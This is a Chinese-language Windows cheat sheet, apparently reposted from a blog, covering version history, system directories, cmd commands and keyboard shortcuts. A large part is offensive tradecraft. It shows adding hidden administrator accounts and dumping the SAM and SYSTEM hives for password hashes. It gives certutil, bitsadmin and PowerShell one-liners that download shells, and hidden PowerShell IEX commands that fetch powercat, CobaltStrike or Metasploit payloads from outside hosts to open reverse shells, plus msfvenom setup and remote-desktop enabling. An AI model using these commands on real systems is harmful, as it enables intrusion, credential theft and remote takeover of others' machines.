[Microsoft Windows](https://baike.baidu.com/item/Microsoft Windows),是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。
MS-Dos
版本号 | 发布时间 |
---|---|
Windows1.0 | 1985.11 |
Windows2.0 | 1987.12 |
Windows2.1 | 1988 |
Windows3.0 | 1990.5 |
Windows3.1 | 1992 |
Windows3.2 | 1994 |
WIN 9X
版本号 | 发布时间 |
---|---|
Windows95 | 1995.8(拥有开始按钮和菜单栏) |
Windows98 | 1998.6(真正意义上的图形化界面系统) |
Windows98SE | 1999 |
WindowsME | 2000.9 |
WIN NT
版本号 | 发布时间 |
---|---|
WindowsNT3.1 | 1993 |
WindowsNT4.0 | 1996.4 |
Windows 2000 (NT5.0) | 2000 |
Windows XP (NT5.1) | 2001.10 2009.4停止更新 |
Window Vista (NT6.0) | 2007.1 2011.7停止更新 2017年4月停止所有支持 |
Windows 7 (NT6.1) | 2009.7 2020.1停止所有支持 |
Windows 8 (NT6.3) | 2012.10 |
Windows 8.1 | 2013.10 |
Windows 10 (NT10.0) | 2015.7 |
Windows Server
版本号 | 发布时间 |
---|---|
Windows Server 2003 | 2003.3 2015.7停止更新 |
Windows Server 2008 | 2008.2 |
Windows Server 2012 | 2012.9 |
Windows Server 2016 | 2016.10 |
C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 这个目录下存放着这个用户开机启动的程序
C:\programData\Microsoft\Winodws\Start Menu\Programs\StartUp 这个目录下存放这开机自启的程序
C:\Windows 这个目录是系统的安装目录
C:\Windows\System32 这个目录下存放着系统的配置文件
C:\Windows\System32\config\SAM 这个目录下的SAM文件存放着用户的登录账户和密码,要清楚账户和密码,需要进PE系统把这个文件删掉,对应系统进程: lsass.exe
C:\PerfLogs 这个是系统日志目录
#系统信息
systeminfo 查看系统信息
hostname 查看主机名
SET 查看环境变量
color 改变cmd颜色
cls 清除屏幕
#网络
ping -t -l 65500 ip 死亡之ping
ipconfig /release 释放ip
ipconfig /renew 重新获得ip
ipconfig /flushdns 刷新DNS缓存
route print 打印路由信息
arp -a 查看arp缓存
net view 查看局域网内其他计算机名称
netsh firewall show state 防火墙状态
netsh firewall show config 防火墙规则
#用户
whoami 查看系统当前用户
net user 查看有哪些用户
net user xie 查看用户xie的信息
net localgroup 查看组
net localgroup administrators 查看组administrators的信息
net user hack 123 /add 新建一个用户hack,密码为123
net user hack$ 123 /add 新建一个隐藏hack用户,密码为123
net user hack /del 删除用户hack
net localgroup administrators hack /add 将普通用户hack提权到管理员
net user guest /active:yes 激活guest用户
net user guest /active:no 关闭guest用户
net password 密码 更改系统当前登录用户密码
net user guest 密码 更改guest用户密码
#端口进程服务
tasklist 查看进程
tasklist /svc 查看进程,显示进程使用者名称
netstat -ano 查看系统开放端口
netstat -ano|findstr 80 查看80端口对应的PID
tasklist | findstr 80 查看80端口对应的进程
taskkill /f /t /im xx.exe 杀死xx.exe进程
taskkill /F -pid 520 杀死pid为520的进程
net start 查看开启了哪些服务
net start telnet 开启telnet服务
net stop telnet 停止 telnet服务
start www.baidu.com 打开网址
#共享
net use 查看连接
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C盘共享
net use \\192.168.10.15\ipc$ /u:"" "" 与192.168.10.15建立ipc空连接
net use \\192.168.10.15 /u:"" "" 与192.168.10.15建立ipc空连接,可以吧ipc$去掉
net use \\192.168.10.15 /u:"administrator" "root" 以administrator身份与192.168.10.15建立ipc连接
net use \\192.168.10.15 /del 删除ipc连接
net use \\192.168.10.15\c$ /u:"administrator" "root" 建立C盘共享
dir \\192.168.10.15\c$ 查看192.168.10.15C盘文件
dir \\192.168.10.15\c$\user 查看192.168.10.15C盘文件下的user目录
dir \\192.168.10.15\c$\user\test.exe 查看192.168.10.15C盘文件下的user目录下的test.exe文件
net use \\192.168.10.15\c$ /del 删除该C盘共享连接
net use k: \\192.168.10.15\c$ /u:"administrator" "root" 将目标C盘映射到本地K盘
net use k: /del 删除该映射
#文件操作
echo hello,word > 1.txt 向1.txt中写入 hello,word
echo hello,word >>1.txt 向1.txt中追加 hello,word
del 删除一个文件
deltree 删除文件夹和它下面的所有子文件夹还有文件
ren 1.txt 2.txt 将 1.txt 重命名为 2.txt
type 1.txt 查看1.txt文件的内容
md 创建一个文件夹
rd 删除一个文件夹
move 1.txt d:/ 将1.txt文件移动到d盘下
type 123.txt 打开123.txt文件
dir c:\ 查看C盘下的文件
dir c:\ /A 查看C盘下的所有文件,包括隐藏文件
dir c:\ /S 查看C盘下和其子文件夹下的文件
dir c:\ /B 只显示C盘下的文件名
shutdown -s -t 60 -c “你的电脑被黑了” -s关机 -r重启 -a取消
type nul> t1.txt 创建t1.txt文件;
copy con A.txt 创建A.txt文本文件;
hello,word 输入内容;
按CTRL+Z键,之后再回车;
reg save hklm\sam sam.hive
reg save hklm\system system.hive
这两个文件是windows的用户账户数据库,所有用户的登录名以及口令等相关信息都会保存在文件中,这两条命令是获取windows管理员的hash值
无论是bitsadmin还是certutil,都要将下载的文件放到拥有权限的目录,否则会提示权限拒绝
certutil
certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,一下命令是在Win7及其以后的机器使用。
certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下
certutil -urlcache -split -f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下
bitsadmin
bitsadmin 可以用来在windows 命令行下下载文件。bitsadmin是windows 后台智能传输服务的一个工具,windows 的自动更新,补丁之类的下载就是用这个工具来实现的。Windows Server2003和XP是没有bitsadmin的,Winc7及其之后的机器才有。
bitsadmin的一些特性:
用法:
bitsadmin /transfer test http://files.cnblogs.com/files/gayhub/bcn.js c:\users\xie\desktop\shell.php
# "任务名" 可以随意起,保存文件的文件路径必须是已经存在的目录,否则不能下载。
下载完成后
默认情况下bitsadmin下载速度极慢,下载较大文件需要设置优先级提速,以下是用法示例
start bitsadmin /transfer test http://192.168.10.14/test.exe f:\test.exe
bitsadmin /setpriority test foreground #设置任务test为最高优先级
相关文章:使用bitsadmin.exe 下载文件,配合bcn.bat玩出更多的花样
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 [.NET Framework](https://baike.baidu.com/item/.NET Framework)的强大功能。
Windows XP 和 Windows Server 2003是没有Powershell的,Win7、2008 Server 及其以后的有。
#在cmd窗口下执行,将远程主机上的test.exe 下载到本地的桌面上
powershell "$c=new-Object \"System.Net.WebClient\";$c.DownloadFile(\"http://192.168.10.11/test.exe\",\"C:/Users/Administrator/Desktop/test.exe\");";
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 [.NET Framework](https://baike.baidu.com/item/.NET Framework)的强大功能。
Windows XP 和 Windows Server 2003是没有Powershell的,Win7、2008 Server 及其以后的有。
#在cmd窗口下执行,将远程主机上的test.exe 下载到本地的桌面上
powershell "$c=new-Object \"System.Net.WebClient\";$c.DownloadFile(\"http://192.168.10.11/test.exe\",\"C:/Users/Administrator/Desktop/test.exe\");";
@echo off 表示在此语句后所有运行的命令都不显示命令行本身
echo 显示这行后面的文字
title 标题
rem 注释命令
cls 清除窗口
set /a 赋值
set /p name= 接受用户输入,保存在name中
%name% 输出用户的输入
if else 判断
GEQ 大于等于
LSS 小于
goto :1 :2 跳转到
exit 退出程序
start 启动文件
call 调用另一个批处理文件
dir c:\*.*>a.txt 将C盘文件列表写入a.txt
del 删除一个或多个文件
Alt+Tab 快速切换程序
Alt+F4 快速关闭程序
Alt 矩形选择
Alt+双击文件 查看文件属性
Shift+delete 永久删除文件
Ctrl+。 中英文标点切换
Ctrl+S 保存
Ctrl+N 新建
Ctrl+W 关闭程序
Ctrl+U 加下划线
Ctrl+Z 撤销操作
Ctrl+B 粗体
Ctrl+I 斜体
Ctrl+shift+esc 快速打开任务管理器
Win+D 快速回到桌面
Win+I 快速打开设置
Win+A 打开操作中心
Win+Q 打开语音助手cortana
Win+X 打开windows功能
Win+Pause 我的电脑的属性
dxdiag 查询电脑硬件配置信息
control 控制面板
services.msc 服务
msconfig 系统配置
regedit 注册表
ncpa.cpl 网络连接
firewall.cpl 防火墙
devmgmt.msc 设备管理器
diskmgmt.msc 磁盘管理实用
compmgmt.msc 计算机管理
winver 检查Windows版本
write 写字板
mspaint 画图板
mstsc 远程桌面连接
magnify 放大镜实用程序
notepad 打开记事本
shrpubw 创建共享文件夹
calc 启动计算器
osk 打开屏幕键盘
注册表(Registry,繁体中文版Windows称之为登录)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的配置信息
关闭端口:
命令行方式关闭端口,实际上是调用了防火墙。以管理员权限打开cmd窗口,执行下面命令,以下是演示关闭139端口
netsh advfirewall set allprofile state on
netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139 #想关闭其他端口,把139替换成其他端口就行
也可以直接在防火墙图形化界面关闭:
然后一直下一步就可以了
windows中包括系统进程和程序进程。
ctrl+shift+esc 打开任务管理器,可以查看进程信息。用户名为SYSTEM的是系统进程。
一些常见的系统进程和含义:
windows中使用 netstat 命令用来监听端口
cmd窗口下利用Powershell反弹NC shell
亲测所有机器都适用
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd.exe"
cmd窗口下利用Powershell反弹CobaltStrike shell
windows10 经常性不能用。windows 2008R2以下百分百适用。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))" #后台运行
powershell.exe -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"
cmd窗口下反弹MSF shell
VPS上的操作
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=114.128.90.138 lport=7788 -f psh-reflection >7788.ps1 #生成木马文件 7788.ps1
python -m SimpleHTTPServer 80 #开启web服务
#MSF监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 114.118.80.138
set lport 7788
exploit -j
目标机的操作
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1" #后台运行
或者
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1"
以下命令需要administrator权限运行,XP / 2003 / Win7 / Win2008 R2 Server 亲测可用
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
C:\Windows\System32\wbem\wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
转自https://www.cnblogs.com/csnd/p/11807589.html